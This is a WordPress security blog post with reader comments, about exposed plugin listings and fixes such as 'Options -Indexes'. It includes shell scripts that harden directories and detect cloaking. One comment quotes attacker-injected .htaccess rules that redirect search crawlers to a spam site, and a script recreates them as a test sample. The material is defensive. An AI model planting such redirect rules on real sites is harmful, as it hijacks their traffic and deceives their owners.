Are you running a WordPress blog on your website space? If yes, be careful: it may be open to hackers. Luckily, fellow blogger AshChuan has shared some methods of prevention. Her blog was hacked on January 24, and fortunately no data was lost.
In a later post she wrote up tips she found from Matt Cutts (a Google employee) for protecting your WordPress blog. I had seriously never noticed how much WordPress may be lacking in security.
Try entering this into your browser window (or a new tab), replacing the domain with your own:
http://www.your-domain.com/wp-content/plugins/
You’ll find that your WordPress plugins list is open for the whole Internet to see. That was a shocker for me, and it was one of the steps the hacker used to break into Ashley’s blog. Once the plugin list was known, the hacker exploited one of the buggy plugins: the WordPress Forum plugin v1.7.4 by Fredrik Fahlstad.
According to Ash, the plugin allowed the hacker to perform a remote SQL injection exploit. She reported that the hacker gained access to her WordPress admin account and changed her password. Luckily, the database wasn’t damaged in the incident.
Matt Cutts said that uploading an ordinary index.html into the folder prevents a person from loading your plugins list. I’ve done it and it works like a charm. However, having tested further, I’m now worried about other folders that may be accessible.
If you’d like to further secure your WordPress blog, there’s a .htaccess method you can use. The details can be found on either AshChuan’s blog or Matt Cutts’ blog.
Any other WordPress security measures you would like to share?
Updated: January 3, 2008
Geminigeek shared that adding Options -Indexes to your .htaccess is an easier way than creating an index.html in every WordPress folder. You will find the .htaccess in your blog directory (the folder you installed your blog in). Otherwise, you’ll need to create a new .htaccess file.
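As an added example (not code from the original post or from Geminigeek's comment), here is a small POSIX shell script that applies both fixes discussed above to a WordPress install: it appends Options -Indexes to the site's .htaccess if no such directive is already there, and drops an empty index.html into every wp-content subfolder that lacks one. The blog path argument, the function names and the usage line are my assumptions.

```sh
#!/bin/sh
# Added example, not code from the original post: apply the two
# directory-listing fixes discussed above to a WordPress install.
#   1. disable_indexes        - add "Options -Indexes" to .htaccess (once)
#   2. add_index_placeholders - empty index.html in each wp-content folder
# Usage: sh harden_listing.sh /path/to/blog   (path and names are assumed)

disable_indexes() {
    wp_root="$1"
    htaccess="$wp_root/.htaccess"
    # The file may not exist yet (the post notes you may need to create it).
    [ -f "$htaccess" ] || : > "$htaccess"
    # Only add the directive if no Options line already turns Indexes off.
    if grep -qE '^[[:space:]]*Options[[:space:]].*-Indexes' "$htaccess"; then
        echo "Options -Indexes already present in $htaccess"
    else
        printf '\n# disable directory listings\nOptions -Indexes\n' >> "$htaccess"
        echo "added Options -Indexes to $htaccess"
    fi
}

add_index_placeholders() {
    wp_root="$1"
    # For every directory under wp-content without an index.html, create an
    # empty one (enough to stop Apache generating a listing) and print the
    # number of files created. -exec with sh -c keeps paths with spaces safe.
    created=$(find "$wp_root/wp-content" -type d \
        ! -exec sh -c 'test -f "$1/index.html"' _ '{}' \; \
        -exec sh -c ': > "$1/index.html"' _ '{}' \; -print | wc -l)
    echo $((created))
}

if [ "$#" -gt 0 ]; then
    disable_indexes "$1"
    echo "created $(add_index_placeholders "$1") placeholder index.html files"
fi
```

Note that a .htaccess directive only takes effect if the host's Apache configuration allows it (AllowOverride Options or AllowOverride All for that directory); if the site starts returning a 500 error after adding the line, the host disallows it and the index.html method is the fallback. Re-running the script is safe: the directive is added once and existing index.html files are left alone.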
Thanks for the tips. Basically I didn’t have any protection before.
Putting Options -Indexes in your .htaccess is way faster than manually creating an index file in each directory. It works for me.
plantmy:
Well, a lesson learnt is a benefit gained. Or it goes something like that.
gemini:
Thanks for the suggestion. I’ve done that and it is easier. Will update the article. :)
Thanks for the info.
There’s a pretty comprehensive whitepaper on securing WordPress installations by blogsecurity.net.
Worth downloading. It’s free. I’ve written a summary about the whitepaper on my website.
http://ashchuan.com/blog/2008/02/03/securing-your-wordpress-installation/
Thanks for the sharing, Ash. I’m going to download and have a read through. :)
Adding an index.html to the plugin folder will not prevent hackers from knowing your plugin list.
Thanks for sharing, tk2.
Hope you’d be able to share a more secure way, since you came up with an automated way to guess what plugins the author could be running. :)
Another method is called “cloaking”, in which your website gets redirected to a spammy website if you are the Google spider bot. This is difficult to spot, given that we are not the Google spider bot, but the good news is that we can pretend to be. Just install the “User Agent Switcher” for Firefox and add a definition for Googlebot (see http://www.searchenginejournal.com/how-to-switch-your-user-agent-to-googlebot/7249/).
How did they do it?
This is what they added to my .htaccess file after many *blank lines* (so that you could easily miss this addition!!!):
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://spammy_website/ [R=301,L]
N.B. make sure you scroll down to the end of your .htaccess file when checking!
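The check the commenter describes can also be done against the file itself. As an added example (not code from the comment above or from the original post), the shell script below scans a .htaccess for the cloaking pattern quoted there: a RewriteCond on HTTP_USER_AGENT naming search-engine crawlers, followed by a RewriteRule that redirects to an external URL. It reports line numbers and the file's total length, so a rule hidden after many blank lines is still surfaced. The function names, the constructed sample file and its placeholder .invalid target are my assumptions; the bot names extend the comment's list with bingbot.

```sh
#!/bin/sh
# Added example, not code from the comment above: check a .htaccess file for
# the crawler-cloaking pattern described there, a RewriteCond that matches
# search-engine user agents followed by a RewriteRule redirecting elsewhere.
# Reports line numbers so a rule buried after many blank lines is not missed.
# Function names and the constructed sample file are assumptions.

cloaking_lines() {
    # Print "lineno:text" for every RewriteCond keyed on crawler user agents.
    grep -niE 'RewriteCond[[:space:]]+%[{]HTTP_USER_AGENT[}].*(googlebot|slurp|msnbot|bingbot)' "$1" || true
}

scan_htaccess() {
    file="$1"
    total=$(wc -l < "$file")
    hits=$(cloaking_lines "$file")
    if [ -z "$hits" ]; then
        echo "OK: no crawler-conditioned RewriteCond in $file ($((total)) lines)"
        return 0
    fi
    echo "SUSPECT: crawler-conditioned rewrite in $file ($((total)) lines, check the end):"
    echo "$hits"
    # Also show any rule that redirects to an external URL; that is the payload.
    grep -niE '^[[:space:]]*RewriteRule[[:space:]].*https?://' "$file" || true
    return 1
}

make_sample_htaccess() {
    # Constructed sample: WordPress's standard block, 20 blank lines, then an
    # injected redirect shaped like the one quoted in the comment (target is
    # a placeholder .invalid domain).
    {
        printf '# BEGIN WordPress\nRewriteEngine On\nRewriteBase /\n'
        printf 'RewriteRule ^index\\.php$ - [L]\n# END WordPress\n'
        i=0
        while [ "$i" -lt 20 ]; do echo; i=$((i + 1)); done
        printf 'RewriteBase /\n'
        printf 'RewriteCond %%{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)\n'
        printf 'RewriteRule ^ http://spammy-website.invalid/ [R=301,L]\n'
    } > "$1"
}

if [ "$#" -gt 0 ]; then
    scan_htaccess "$1"
fi
```

Run it as sh scan_htaccess.sh /path/to/blog/.htaccess; a non-zero exit means a suspect rule was found, which makes it easy to drop into a cron job. The file scan complements the User Agent Switcher check rather than replacing it: one inspects the rules on disk, the other observes what the server actually serves, and a clean .htaccess does not rule out a redirect injected into PHP files or the server configuration, so the browser-side check still matters.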
Wow! They hacked your site and added something to the .htaccess. Now that’s bad. Thankfully, my host security hasn’t experienced this yet and I hope it doesn’t happen.
Very informative. I must check my blog now.
At the end of the day, if they really want to do something to your website/blog, they will. But it’s still good to have preventions in place. :)